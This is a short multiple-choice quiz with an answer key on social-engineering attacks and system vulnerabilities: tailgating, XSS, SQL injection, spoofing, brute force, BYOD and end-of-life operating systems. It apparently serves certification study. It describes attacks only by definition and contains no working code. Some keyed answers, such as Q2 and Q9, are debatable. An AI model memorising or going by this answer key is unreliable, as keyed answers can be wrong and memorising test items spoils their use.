2.4: Explain common social-engineering attacks, threats, and vulnerabilities

Question 1

An unauthorised person gains physical access to a restricted area simply by following close behind an authorised person as they enter.

a. Tailgating
b. Shoulder surfing
c. Dumpster diving
d. Evil Twin

Answer 1

a. Tailgating

Question 2

An employee uses their personal laptop to access company data. The laptop is not protected by the companies antivirus and firewall software.
What type of vulnerability is this?

a. Unpatched systems
b. EOL OSs
c. Non-compliant systems
d. BYOD
e. Unprotected systems

Answer 2

d. BYOD

Question 3

A company is still running an old version of Windows which is no longer supported by Microsoft and cannot apply the latest security patches.
What type of vulnerability is this?

a. Unpatched systems
b. EOL OSs
c. Non-compliant systems
d. BYOD
e. Unprotected systems

Answer 3

b. EOL OSs

Question 4

What type of attack inserts malicious scripts into a website, which can then be executed in users’ browsers, leading to data theft, session hijacking, or other attacks?

a. On-path attack
b. Brute-force attack
c. Structured Query Language (SQL) injection
d. Cross-site scripting (XSS)

Answer 4

d. Cross-site scripting (XSS)

Question 5

What type of attack inserts harmful code into a database through a website’s input fields, potentially allowing the attacker to steal or manipulate data?

a. On-path attack
b. Insider threat
c. Structured Query Language (SQL) injection
d. Cross-site scripting (XSS)

Answer 5

c. Structured Query Language injection

Question 6

What type of attack involves the attacker masking their identity as a trusted source, such as a bank, a friend, or a website, to trick users into revealing sensitive information or taking harmful actions?

a. Dos
b. Spoofing
c. On-path attack
d. Insider threat

Answer 6

b. Spoofing

Question 7

What type of attack attempts to guess passwords or encryption keys by systematically trying every possible combination until it finds the correct one?

a. Spoofing
b. Brute-force attack
c. Dictionary attack
d. Structure Query Language (SQL) attack

Answer 7

b. Brute-force attack

Question 8

A companies IT technician has sent instructions to an employee on how to install an authorised database management system. The employee mistakenly installs an older version of the system and struggles to configure it as the set up doesn’t match the technicians instructions. The employee manages to get the system up and running and continues to use the out-of-date software.
What type of vulnerability is this?

a. Unpatched systems
b. EOL OSs
c. Non-compliant systems
d. BYOD
e. Unprotected systems

Answer 8

c. Non-compliant systems

Question 9

An employee clicks on a malicious link in an email, malware infects their device and spreads to other systems on the network. What type of vulnerability is this?

a. Unpatched systems
b. EOL OSs
c. Non-compliant systems
d. BYOD
e. Unprotected systems

Answer 9

e. Unprotected systems

Question 10

A company doesn’t enforce operating system updates. What type of vulnerability is this?

a. Unpatched systems
b. EOL OSs
c. Non-compliant systems
d. BYOD
e. Unprotected systems

Answer 10

a. Unpatched systems